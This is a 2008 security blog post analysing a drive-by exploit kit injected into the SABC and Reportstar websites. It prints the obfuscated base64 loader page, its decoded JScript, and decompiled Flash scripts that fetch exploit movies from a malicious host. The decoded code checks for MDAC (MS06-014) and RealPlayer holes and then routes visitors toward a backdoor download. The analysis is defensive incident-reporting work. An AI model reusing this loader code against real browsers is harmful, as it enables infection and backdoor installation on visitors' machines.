Tuesday, June 3, 2008

Silent Love China - Reference to sabc.co.za and reportstar.net hax

After a bit of excitement in the office about yesterday’s post, we decided to do a bit of analysis on the worm that hit the SABC and Reportstar (time constraints applicable).

We obviously used our limited time trying to find out exactly what htm files, javascript, swf and exe’s we could get out, and what exactly they did.

The files which we are currently storing in our lab are:

m.js – Entry injection page

1847687.js – “// A Popular Free Statistics Service for 100 000+ Webmasters.”

456.htm – Loads 4561 or 4562 (swf)

4561.swf – we decompiled this

4562.swf – we decompiled this too

am6.htm - links to both http://ph.errtys.org/ax14.htm and http://ph.errtys.org/re10.htm - also includes activex objects and iframes of http://ph.errtys.org/axlz.htm and http://ph.errtys.org/re11.htm .

ax14.htm – javascripts and vbscript

axlz.htm - more scripts

bak.exe – l33t Trojan

dj – base64

dj.htm – includes “by shadow MSN:[email protected] email:[email protected] and the base64. Microsoft Data Access Components (MDAC) Function (MS06-014).

dj.output.base64.decode – out put of base64 – jscript and "Adodb.Stream"

re10.htm – Javascript + base64

re11.htm – Javascript – including the interesting text “fuckyoukaspersky”

All these files are from iframe’s or links from src code, which were originally from http://www.dota11.cn/m.js.

A fantastic sitemap by Jeremy Conway details things very well:

Now if we take a look at Dj.htm:

<.HTML>

<.BODY>

<.title>by shadow MSN:[email protected] email: [email protected]

<.script>

var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i<<2)|((c2&0x30)>>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<<4)|((c3&0x3c)>>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<<6)|c4)}return>

document.write(base64decode ("PHNjcmlwdD53aW5kb3cub25lcnJvcj1mdW5jdGlvbigpe3JldHVybiB0cnVlO308L3NjcmlwdD4NCjxTY3JpcHQgTGFuZ3VhZ2U9IkpTY3JpcHQiPg0KCXZhciBjb29rID0gInNpbGVudHdtIjsNCgkNCglmdW5jdGlvbiBzZXRDb29raWUobmFtZSwgdmFsdWUsIGV4cGlyZSkgDQoJeyAgIA0KCQl3aW5kb3cuZG9jdW1lbnQuY29va2llID0gbmFtZSArICI9IiArIGVzY2FwZSh2YWx1ZSkgKyAoKGV4cGlyZSA9PSBudWxsKSA/ICIiIDogKCI7IGV4cGlyZXM9IiArIGV4cGlyZS50b0dNVFN0cmluZygpKSk7DQoJfQ0KDQoJZnVuY3Rpb24gZ2V0Q29va2llKE5hbWUpIA0KCXsgICANCgkJdmFyIHNlYXJjaCA9IE5hbWUgKyAiPSI7DQoJCWlmICh3aW5kb3cuZG9jdW1lbnQuY29va2llLmxlbmd0aCA+IDApIA0KCQl7IA0KCQkJb2Zmc2V0ID0gd2luZG93LmRvY3VtZW50LmNvb2tpZS5pbmRleE9mKHNlYXJjaCk7DQoJCQlpZiAob2Zmc2V0ICE9IC0xKSANCgkJCXsgDQoJCQkJb2Zmc2V0ICs9IHNlYXJjaC5sZW5ndGg7ICAgICAgIA0KCQkJICBlbmQgPSB3aW5kb3cuZG9jdW1lbnQuY29va2llLmluZGV4T2YoIjsiLCBvZmZzZXQpICAgICAgIA0KCQkJICBpZiAoZW5kID09IC0xKQ0KCQkJICAgIGVuZCA9IHdpbmRvdy5kb2N1bWVudC5jb29raWUubGVuZ3RoOw0KCQkJICByZXR1cm4gdW5lc2NhcGUod2luZG93LmRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcob2Zmc2V0LCBlbmQpKTsNCgkJCSB9DQoJCSB9DQoJICByZXR1cm4gbnVsbDsNCgl9DQoNCglmdW5jdGlvbiByZWdpc3RlcihuYW1lKSANCgl7DQoJCXZhciB0b2RheSA9IG5ldyBEYXRlKCk7DQoJCXZhciBleHBpcmVzID0gbmV3IERhdGUoKTsNCgkJZXhwaXJlcy5zZXRUaW1lKHRvZGF5LmdldFRpbWUoKSArIDEwMDAqNjAqNjAqMjQpOw0KCQlzZXRDb29raWUoY29vaywgbmFtZSwgZXhwaXJlcyk7DQoJfQ0KDQoJZnVuY3Rpb24gb3BlbldNKCkgDQoJew0KCQl2YXIgYyA9IGdldENvb2tpZShjb29rKTsNCgkJaWYgKGMgIT0gbnVsbCkgDQoJCXsNCgkgIAlyZXR1cm47DQoJCX0NCgkJDQoJCXJlZ2lzdGVyKGNvb2spOw0KCQkNCgkJd2luZG93LmRlZmF1bHRTdGF0dXM9IuWujOaIkCI7DQoJCQkNCgkJdHJ5eyB2YXIgZTsNCgkJCXZhciBhZG89KGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoIm9iamVjdCIpKTsNCgkJCWFkby5zZXRBdHRyaWJ1dGUoImNsYXNzaWQiLCJjbHNpZDpCRDk2QzU1Ni02NUEzLTExRDAtOTgzQS0wMEMwNEZDMjlFMzYiKTsNCgkJCXZhciBhcz1hZG8uY3JlYXRlb2JqZWN0KCJBZG9kYi5TdHJlYW0iLCIiKX0NCgkJY2F0Y2goZSl7fTsNCgkJZmluYWxseXsNCgkJCWlmKGUhPSJbb2JqZWN0IEVycm9yXSIpew0KCQkJCWRvY3VtZW50LndyaXRlKCI8aWZyYW1lIHdpZHRoPTUwIGhlaWdodD0wIHNyYz0xNC5odG0+PC9pZnJhbWU+Iil9DQoJCQllbHNlDQoJCQl7CQ0KCQkJCXRyeXsgdmFyIGo7DQoJCQkJCXZhciByZWFsMTE9bmV3IEFjdGl2ZVhPYmplY3QoIklFUlAiKyJDdGwuSSIrIkVSUEN0bC4xIik7fQ0KCQkJCWNhdGNoKGope307DQoJCQkJZmluYWxseXtpZihqIT0iW29iamVjdCBFcnJvcl0iKXtpZihuZXcgQWN0aXZlWE9iamVjdCgiSUVSUEN0bC5JRVJQQ3RsLjEiKS5QbGF5ZXJQcm9wZXJ0eSgiUFJPRFVDVFZFUlNJT04iKTw9IjYuMC4xNC41NTIiKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHtkb2N1bWVudC53cml0ZSgnPGlmcmFtZSB3aWR0aD0xMCBoZWlnaHQ9MCBzcmM9cmwuaHRtPjwvaWZyYW1lPicpfQ0KICAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICAgICAgICAgICB7DQoJCQkJCWRvY3VtZW50LndyaXRlKCc8aWZyYW1lIHdpZHRoPTEwIGhlaWdodD0wIHNyYz1uZXcuaHRtPjwvaWZyYW1lPicpfX19DQoNCgkJCQkJZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9NTAgaGVpZ2h0PTAgc3JjPTA0Lmh0bT48L2lmcmFtZT4nKQ0KDQoJCQkJaWYoaj09IltvYmplY3QgRXJyb3JdIikNCgkJCQl7bG9jYXRpb24ucmVwbGFjZSgiYWJvdXQ6YmxhbmsiKTt9DQoJCQl9fQ0KCX0NCg0Kb3BlbldNKCk7DQo8L3NjcmlwdD4="));

<./script>

<./BODY>

<./HTML>

We decoded this to the following script:

<.script>window.onerror=function(){return true;}

<.Script Language="JScript">

var cook = "silentwm";

function setCookie(name, value, expire)

{

window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));

}

function getCookie(Name)

{

var search = Name + "=";

if (window.document.cookie.length > 0)

{

offset = window.document.cookie.indexOf(search);

if (offset != -1)

{

offset += search.length;

end = window.document.cookie.indexOf(";", offset)

if (end == -1)

end = window.document.cookie.length;

return unescape(window.document.cookie.substring(offset, end));

}

}

return null;

}

function register(name)

{

var today = new Date();

var expires = new Date();

expires.setTime(today.getTime() + 1000*60*60*24);

setCookie(cook, name, expires);

}

function openWM()

{

var c = getCookie(cook);

if (c != null)

{

return;

}

register(cook);

window.defaultStatus="å®æ";

try{ var e;

var ado=(document.createElement("object"));

ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var as=ado.createobject("Adodb.Stream","")}

catch(e){};

finally{

if(e!="[object Error]"){

document.write("")}

else

{

try{ var j;

var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}

catch(j){};

finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")

{document.write('')}

else

{

document.write('')}}}

document.write('')

if(j=="[object Error]")

{location.replace("about:blank");}

}}

}

openWM();

<./script>

Bear in mind that posting this on the blog, we changed a couple of things in the src code, but in any event, you should get the idea.

So, this is quite impressive because if your personal configuration does not give any sort of errors with the creation of the Adobe.Stream object, you will be directed to 14.htm.

From this point, the malicious binary and backdoor “bak.exe” will by downloaded to your computer via the MDAC vulnerability(if you are unpatched that is).

If any sort of errors occur a Real Player “hax” will be checked for, and this includes several different versions and vulnerabilities.

Once again, if nothing is picked up and if any errors accour, you will be taken to rl.htm and your machine will be potentially backdoored. I must stress that if it fails, it will check for several different Real Player vulnerabilities, some of which are much more recent(Including heap spraying techniques). So, thanks to websites being vulnerable, the general public now have a big issue. Anyway...

Lets take a look at 123.htm:

<.script>window.onerror=function(){return true;}

<.Script Language="JScript">

var cook = "silentwm";

function setCookie(name, value, expire)

{

window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));

}

function getCookie(Name)

{

var search = Name + "=";

if (window.document.cookie.length > 0)

{

offset = window.document.cookie.indexOf(search);

if (offset != -1)

{

offset += search.length;

end = window.document.cookie.indexOf(";", offset)

if (end == -1)

end = window.document.cookie.length;

return unescape(window.document.cookie.substring(offset, end));

}

}

return null;

}

function register(name)

{

var today = new Date();

var expires = new Date();

expires.setTime(today.getTime() + 1000*60*60*24);

setCookie(cook, name, expires);

}

function openWM()

{

var c = getCookie(cook);

if (c != null)

{

return;

}

register(cook);

window.defaultStatus="å®æ";

try{ var e;

var ado=(document.createElement("object"));

ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var as=ado.createobject("Adodb.Stream","")}

catch(e){};

finally{

if(e!="[object Error]"){

document.write("")}

else

{

try{ var j;

var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}

catch(j){};

finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")

{document.write('')}

else

{

document.write('')}}}

document.write('')

if(j=="[object Error]")

{location.replace("about:blank");}

}}

}

openWM();

<./script>

Once again, please bear in mind that the above has been edited for the blog post.

There are actually 2 separate files that have the same content as per above, but both of them are hosting malicious swf files. In addition to this if you are using different browsers different files are loaded (i.e. 4561.swf and 4562.swf).

Decompiling the flash objects brought Flash action scripts, which load other movies:

4561.swf

var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();

4562.swf

var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'f.swf', _root);
stop();

These refer to instances of swf files which are dangerous and obviously refer to the Adobe Flash Player vulnerabilities. There are also other functions which load in the Trojan “bak.exe”which refer to RDS.Datacontrol (MS06-014) which we mentioned earlier.

Please take into account the severity of this issue, and obviously the huge impact. The general end user who visits these websites are usually not up to date with versions of Realplayer, Flash and obviously Microsoft updates.

Take into account that this was also done in very little time, just to check the possible impact by visiting those two sites. If anyone wants a copy of the above files for any sort of analysis, please do let us know and we would be more than happy to send them across.

All users that visited sabc.co.za or reportstar.net in the last little while should be aware that if they had/have vulnerable versions of Realplayer/Shockwave/Microsoft MS06-014 are probably infected and carrying a backdoor. In addition to this, all the stats are well logged for the guys to see exactly what’s going on in their little game.

No comments: